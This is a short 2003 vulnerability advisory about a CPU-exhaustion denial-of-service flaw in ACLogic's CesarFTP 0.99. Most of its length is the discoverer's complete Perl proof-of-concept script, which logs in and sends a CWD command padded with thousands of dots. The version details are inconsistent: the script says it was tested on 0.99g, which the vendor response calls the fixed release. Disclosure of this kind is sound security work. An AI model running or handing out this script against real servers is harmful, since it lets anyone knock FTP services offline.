Reported December 23, 2003, by zib zib.

 

 

VERSIONS AFFECTED

 

  • ACLogic's CesarFTP 0.99

 

DESCRIPTION

 

  •  A Denial of Service (DoS) condition exists in ACLogic's CesarFTP 0.99. By issuing a malformed CWD command, an attacker can cause the FTP server to consume large amounts of CPU time.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

#!/usr/bin/perl -w
use IO::Socket;

########################################
# _ _
# ____ (_) | |__
# |_ / | | | '_ \
# / / | | | |_) |
# /___| |_| |_.__/
#
# http://coding.romainl.com/
#
########################################
##
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user : zib
## pass : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user : zib
##pass : zib
##
##\[~\] prepare to connect...
##\[+\] connected
##\[~\] prepare to send data...
##\[+\] success
##\[~\] Send CPU Overload Sequence...
##\[+\] CPU Overload Sequence sent
##$
########################################

if (@ARGV < 3)
\{
print "#############################################################\n";
print " CesarFTP 0.99g : CPU Overload\n";
print " by zib http://coding.romainl.com/ \n";
print " 22/12/03\n";
print "#############################################################\n";
print " Usage:\n";
print " cesar0.99g_dos.pl <host> <user> <pass>\n";
print "\n";
print " <host> - host for attack\n";
print " <user> - a valid ftp user account, could be anonymous\n";
print " <pass> - pass for the login\n";
print "#############################################################";
exit();
\}

$server = $ARGV\[0\];
$user = $ARGV\[1\];
$pass = $ARGV\[2\];
$nb = 10000;

print "\n";
print "server : $server\n";
print "user : $user\n";
print "pass : $pass\n";
print "\n";

$i = 0;

print "\[~\] prepare to connect...\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "21") || die "\[-\] connect failed\n";
if ($socket)
\{
 print "\[+\] connected\n";
 sleep(5);

 print "\[~\] prepare to send data...\n";
 print $socket "USER $user\r\n";
 print "USER $user\r\n";
 sleep(1);
 while (<$socket>)
 \{
  print $_;
  last;
 \}
 
 print $socket "PASS $pass\r\n";
 print "PASS $pass\r\n";
 sleep(1);
 while (<$socket>)
 \{
  print $_;
  last;
 \}

 print "\[+\] success\n";
 print "\[~\] Send CPU Overload Sequence...\n";
 print $socket "CWD ";
 for($i=0;$i<=$nb;$i=$i+1)
 \{
  print $socket ".";
 \}
 print $socket "\r\n";
 print "CWD sent\n";
 sleep(1);
 while (<$socket>)
 \{
  print $_;
 \}

 print "\[+\] Done\n";
\}

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.aclogic.com/" style="color: blue; text-decoration: underline; text-underline: single">ACLogic</a> has released version 0.99g, which doesn't contain this vulnerability.</h3>

 

CREDIT

 

Discovered by zib zib.